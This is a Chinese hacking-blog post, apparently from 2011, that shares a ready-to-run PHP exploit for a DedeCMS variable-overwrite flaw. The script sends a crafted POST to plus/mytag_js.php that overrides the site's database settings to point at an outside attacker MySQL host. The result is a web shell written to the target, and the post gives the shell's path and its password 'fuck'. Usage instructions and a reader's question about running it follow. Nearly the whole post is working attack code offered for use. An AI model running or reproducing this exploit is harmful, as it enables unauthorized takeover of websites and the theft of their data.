dedecms 变量覆盖 0day getshell 的一个 exp (不久前的 exp好用发出来共享而已),By:黑小子。
dede 不久前爆的洞了 不过这个exp还蛮实用的 呵呵!
Exp:
#!usr/bin/php -w
<?php
error_reporting(E_ERROR);
set_time_limit(0);
print_r('
DEDEcms Variable Coverage
Exploit Author: [url]www.heixiaozi.com[/url] [url]www.webvul.com[/url]
);
echo "\r\n";
if($argv[2]==null){
print_r('
+---------------------------------------------------------------------------+
Usage: php '.$argv[0].' url aid path
aid=1 shellpath /data/cache aid=2 shellpath= / aid=3 shellpath=/plus/
Example:
php '.$argv[0].' [url]www.site.com[/url] 1 old
+---------------------------------------------------------------------------+
');
exit;
}
$url=$argv[1];
$aid=$argv[2];
$path=$argv[3];
$exp=Getshell($url,$aid,$path);
if (strpos($exp,"OK")>12){
echo "[*] Exploit Success \n";
if($aid==1)echo "[*] Shell:".$url."/$path/data/cache/fuck.php\n" ;
if($aid==2)echo "[*] Shell:".$url."/$path/fuck.php\n" ;
if($aid==3)echo "[*] Shell:".$url."/$path/plus/fuck.php\n";
}else{
echo "[*] Exploit Failed \n";
}
function Getshell($url,$aid,$path){
$id=$aid;
$host=$url;
$port="80";
$content ="doaction=http%3A%2F%2F$host%2Fplus%2Fmytag_js.php%3Faid%3D1&_COOKIE%5BGLOBALS%5D%5Bcfg_dbhost%5D=184.105.174.114&_COOKIE%5BGLOBALS%5D%5Bcfg_dbuser%5D=exploit&_COOKIE%5BGLOBALS%5D%5Bcfg_dbpwd%5D=90sec&_COOKIE%5BGLOBALS%5D%5Bcfg_dbname%5D=exploit&_COOKIE%5BGLOBALS%5D%5Bcfg_dbprefix%5D=dede_&nocache=true&QuickSearchBtn=%CC%E1%BD%BB";
$data = "POST /$path/plus/mytag_js.php?aid=".$id." HTTP/1.1\r\n";
$data .= "Host: ".$host."\r\n";
$data .= "User-Agent: Mozilla/5.0 (Windows NT 5.2; rv:5.0.1) Gecko/20100101 Firefox/5.0.1\r\n";
$data .= "Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8\r\n";
$data .= "Accept-Language: zh-cn,zh;q=0.5\r\n";
//$data .= "Accept-Encoding: gzip,deflate\r\n";
$data .= "Accept-Charset: GB2312,utf-8;q=0.7,*;q=0.7\r\n";
$data .= "Connection: keep-alive\r\n";
$data .= "Content-Type: application/x-www-form-urlencoded\r\n";
$data .= "Content-Length: ".strlen($content)."\r\n\r\n";
$data .= $content."\r\n";
$ock=fsockopen($host,$port);
if (!$ock) {
echo "[*] No response from ".$host."\n";
}
fwrite($ock,$data);
while (!feof($ock)) {
$exp=fgets($ock, 1024);
return $exp;
}
}
?> |
搭建php环境 cmd下运行 dede.php php
dede.php lcx.cc 1 vul
第一个是 网站 第二个是 ID 第三个是 路径
一句话密码为fuck
留言评论(旧系统):
佚名 @ 2013-03-11 23:05:53
老大,求解释 初学PHP 这个 要怎么运行...PHP环境搭建了...就是不知道怎么运行
本站回复:
文中已写出说明。
文章作者
Nuclear'Atk
上次更新
2011-09-21
许可协议
Nuclear'Atk(核攻击)网络安全实验室版权所有,转载请注明出处。